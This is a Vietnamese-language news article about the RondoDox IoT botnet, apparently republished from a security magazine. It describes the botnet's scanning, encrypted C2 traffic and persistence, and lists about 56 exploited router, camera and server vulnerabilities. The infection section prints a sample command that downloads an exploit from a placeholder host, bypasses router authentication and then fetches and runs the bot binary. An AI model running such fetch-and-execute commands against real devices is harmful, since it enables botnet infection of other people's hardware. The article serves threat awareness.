Skip to main content

Command Palette

Search for a command to run...

Botnet RondoDox khai thác hơn 50 lỗ hổng để tấn công bộ định tuyến, hệ thống camera quan sát và máy chủ web

Updated
9 min read
Botnet RondoDox khai thác hơn 50 lỗ hổng để tấn công bộ định tuyến, hệ thống camera quan sát và máy chủ web

Kể từ khi xuất hiện vào đầu năm 2025, RondoDox đã nhanh chóng trở thành một trong những botnet tập trung vào IoT phổ biến nhất đang hoạt động, nhắm mục tiêu vào nhiều loại thiết bị được kết nối mạng—từ bộ định tuyến của người tiêu dùng đến hệ thống CCTV doanh nghiệp và máy chủ web.

Thiết kế mô-đun cho phép người vận hành triển khai các mô-đun khai thác được thiết kế riêng để chống lại hơn 50 lỗ hổng bảo mật khác nhau, cho phép xâm nhập nhanh chóng vào các nền tảng khác nhau.

Trong nhiều chiến dịch tấn công , kẻ thù đã tận dụng tính năng quét tự động để xác định các thiết bị bị lộ, sau đó là khai thác nhanh chóng và đăng ký chỉ huy và kiểm soát.

Các nhà nghiên cứu của Trend Micro đã phát hiện ra RondoDox vào tháng 4 năm 2025 sau khi quan sát thấy các mẫu lưu lượng bất thường phát ra từ các thiết bị DVR bị xâm phạm ở nhiều khu vực.

Phân tích tiếp theo cho thấy một công cụ cốt lõi được viết bằng Go, tạo điều kiện triển khai đa nền tảng và kích thước nhị phân hiệu quả.

Các giao thức lệnh của botnet hỗ trợ truyền thông được mã hóa, đảm bảo trao đổi C2 một cách bí mật ngay cả khi bị giám sát mạng.

Sau khi khai thác thành công, RondoDox triển khai một tác nhân duy trì nhẹ được thiết kế để tồn tại sau khi khởi động lại thiết bị và cập nhật chương trình cơ sở.

Tác nhân này định kỳ thăm dò máy chủ C2 để tìm các lệnh hoặc tải trọng mới, trong khi các quy trình tự phục hồi sẽ cài đặt lại các thành phần nếu đã bị xóa.

Nhiễm trùng thường dẫn đến việc thiết bị tham gia vào các cuộc tấn công DDoS quy mô lớn hoặc hoạt động proxy bí mật cho các hoạt động đe dọa tiếp theo.

Cơ chế lây nhiễm

Chuỗi lây nhiễm của RondoDox thường bắt đầu bằng giai đoạn trinh sát trong đó mô-đun quét của phần mềm độc hại sẽ thăm dò các thiết bị để tìm giao diện quản lý Telnet (cổng 23), SSH (cổng 22) và HTTP.

Khi mục tiêu được xác định, dữ liệu khai thác thích hợp - được trích xuất từ ​​kho lưu trữ mở rộng của mục tiêu - sẽ được phân phối.

Ví dụ, trong một mô-đun, trình quét sử dụng phương pháp bỏ qua xác thực bộ định tuyến CVE-2021-20090 để thực thi tải trọng shell:-

wget http[:]//malicious.example/exploit; chmod +x exploit
./ exploit - u admin - p '' - c ' wget http[:]//cdn[.]example/rondox && chmod +x rondox && ./ rondox'

Sau khi thực thi mã ban đầu, tải trọng thiết lập kênh TLS được mã hóa trở lại C2 trên cổng 443, ngụy trang lưu lượng truy cập của nó thành HTTPS hợp pháp.

Các nhà phân tích của Trend Micro lưu ý rằng chương trình mã hóa này dựa trên một gói chứng chỉ tùy chỉnh, làm phức tạp thêm các nỗ lực chặn và kiểm tra.

Sau khi thiết lập được giao tiếp, bot sẽ yêu cầu và tải các mô-đun bổ sung—chẳng hạn như máy quét mạng hoặc công cụ DDoS—trực tiếp vào bộ nhớ.

Luồng lây nhiễm nhiều giai đoạn làm nổi bật quá trình chuyển đổi từ trinh sát sang khai thác và duy trì.

Dòng thời gian của lỗ hổng RondoDox (Nguồn – Trend Micro)

Theo cơ chế lây nhiễm, RondoDox tận dụng các kỹ thuật duy trì dành riêng cho thiết bị, chẳng hạn như mục crontab trên DVR chạy Linux hoặc sửa đổi hình ảnh chương trình cơ sở trên một số mẫu bộ định tuyến, đảm bảo hoạt động liên tục.

Khả năng thích ứng và thư viện khai thác rộng lớn của nó nhấn mạnh nhu cầu cấp thiết về quản lý bản vá và phân đoạn mạng để giảm thiểu mối đe dọa đang phát triển này.

Bảng dưới đây cung cấp tổng quan chi tiết về hơn 50 lỗ hổng bảo mật hiện đang bị RondoDox khai thác, bao gồm mã định danh CVE, sản phẩm bị ảnh hưởng, xếp hạng tác động, điều kiện tiên quyết khai thác bắt buộc và điểm CVSS 3.1.

#Nhà cung cấp / Sản phẩmMã CVECWE / LoạiTrạng tháiGhi chú
1Phần mềm bộ định tuyến NextxtCVE-2022-44149CWE-78 (Tiêm lệnh)Ngày N
2Bộ định tuyến D-LinkCVE-2015-2051CWE-78Ngày N
3Netgear R7000 / R6400CVE-2016-6277CWE-78Ngày N
4Netgear (mini_httpd)CVE-2020-27867CWE-78Ngày N
5Máy chủ HTTP ApacheCVE-2021-41773CWE-22 (Duyệt đường dẫn / RCE)Ngày N
6Máy chủ HTTP ApacheCVE-2021-42013CWE-22Ngày N
7Đầu ghi hình TBKCVE-2024-3721CWE-78Có mục tiêu
8TOTOLINK (setMtknatCfg)CVE-2025-1829CWE-78Ngày N
9Giao diện web MeteobridgeCVE-2025-4008CWE-78Ngày N
10D-Link DNS-320CVE-2020-25506CWE-78Ngày N
11Digiever DS-2105 ProCVE-2023-52163CWE-78Ngày N
12Netgear DGN1000CVE-2024-12847CWE-78Ngày N
13D-Link (nhiều)CVE-2024-10914CWE-78Ngày N
14Bộ định tuyến Edimax RE11SCVE-2025-22905CWE-78Ngày N
15Đầu ghi hình QNAP VioStor NVRCVE-2023-47565CWE-78Ngày N
16D-Link DIR-816CVE-2022-37129CWE-78Ngày N
17GNU Bash (ShellShock)CVE-2014-6271CWE-78 (Tiêm mã)Ngày N / Lịch sử
18Bộ định tuyến gia đình Dasan GPONCVE-2018-10561CWE-287 (Bỏ qua xác thực)Ngày N
19Bộ định tuyến công nghiệp Four-FaithCVE-2024-12856CWE-78Ngày N
20TP-Link Archer AX21CVE-2023-1389CWE-78Có mục tiêu
21Bộ định tuyến D-LinkCVE-2019-16920CWE-78Ngày N
22Tenda (từ NetToolGet)CVE-2025-7414CWE-78Ngày N
23Tenda (tên thiết bị)CVE-2020-10987CWE-78Ngày N
24Bộ định tuyến LB-LINKCVE-2023-26801CWE-78Ngày N
25Dòng Linksys ECVE-2025-34037CWE-78Ngày N
26Camera quan sát AVTECHCVE-2024-7029CWE-78Ngày N
27TOTOLINK X2000RCVE-2025-5504CWE-78Ngày N
28ZyXEL P660HN-T1ACVE-2017-18368CWE-78Ngày N
29Hytec HWL-2511-SSCVE-2022-36553CWE-78Ngày N
30Belkin Play N750CVE-2014-1635CWE-120 (Tràn bộ đệm)Ngày N
31TRENDnet TEW-411BRPplusCVE-2023-51833CWE-78Ngày N
32TP-Link TL-WR840NCVE-2018-11714CWE-78Ngày N
33D-Link DIR820LA1CVE-2023-25280CWE-78Ngày N
34Tỷ 5200W-TCVE-2017-18369CWE-78Ngày N
35Cisco (nhiều sản phẩm)CVE-2019-1663CWE-119 (Hỏng bộ nhớ)Ngày N
36TOTOLINK (setWizardCfg)CVE-2024-1781CWE-78Ngày N
37Đầu ghi hình HikvisionTiêm lệnhKhông có CVEĐược liệt kê bởi Trend Micro không có CVE
38Đầu ghi DahuaThực thi mã từ xaKhông có CVEĐược liệt kê bởi Trend Micro không có CVE
39Bộ định tuyến WavlinkCWE-78Không có CVEĐược liệt kê bởi Trend Micro không có CVE
40Bộ định tuyến ZTE ZXHNCWE-78Không có CVEĐược liệt kê bởi Trend Micro không có CVE
41Đầu ghi hình Seenergy NVRBỏ qua xác thựcKhông có CVEĐược liệt kê bởi Trend Micro không có CVE
42Đầu ghi hình Uniview NVRCWE-78Không có CVEĐược liệt kê bởi Trend Micro không có CVE
43TP-Link TD-W8960NCWE-78Không có CVEĐược liệt kê bởi Trend Micro không có CVE
44Camera IP DahuaCWE-78Không có CVEĐược liệt kê bởi Trend Micro không có CVE
45Phần mềm HiSiliconTràn bộ đệmKhông có CVEĐược liệt kê bởi Trend Micro không có CVE
46Máy ảnh AmcrestCWE-78Không có CVEĐược liệt kê bởi Trend Micro không có CVE
47Camera IP HikvisionCWE-78Không có CVEĐược liệt kê bởi Trend Micro không có CVE
48Máy ảnh LILINCWE-78Không có CVEĐược liệt kê bởi Trend Micro không có CVE
49TP-Link WR941NCWE-78Không có CVEĐược liệt kê bởi Trend Micro không có CVE
50Wavlink WL-WN575A3CWE-78Không có CVEĐược liệt kê bởi Trend Micro không có CVE
51Đầu ghi hình DahuaCWE-78Không có CVEĐược liệt kê bởi Trend Micro không có CVE
52Tenda AC6CWE-78Không có CVEĐược liệt kê bởi Trend Micro không có CVE
53Hikvision DS-7108HGHICWE-78Không có CVEĐược liệt kê bởi Trend Micro không có CVE
54LB-LINK BL-WR450HCWE-78Không có CVEĐược liệt kê bởi Trend Micro không có CVE
55ZTE ZXHN H108NCWE-78Không có CVEĐược liệt kê bởi Trend Micro không có CVE
56Wavlink WL-WN531G3CWE-78Không có CVEĐược liệt kê bởi Trend Micro không có CVE

Theo : Cyber Security News

More from this blog

H

HackVNN Asia Cyber ​​Security Magazine

60 posts

HackVNN Asia Cyber Security Magazine là tạp chí chuyên sâu về an ninh mạng, cung cấp tin tức, phân tích, và giải pháp bảo mật mới nhất.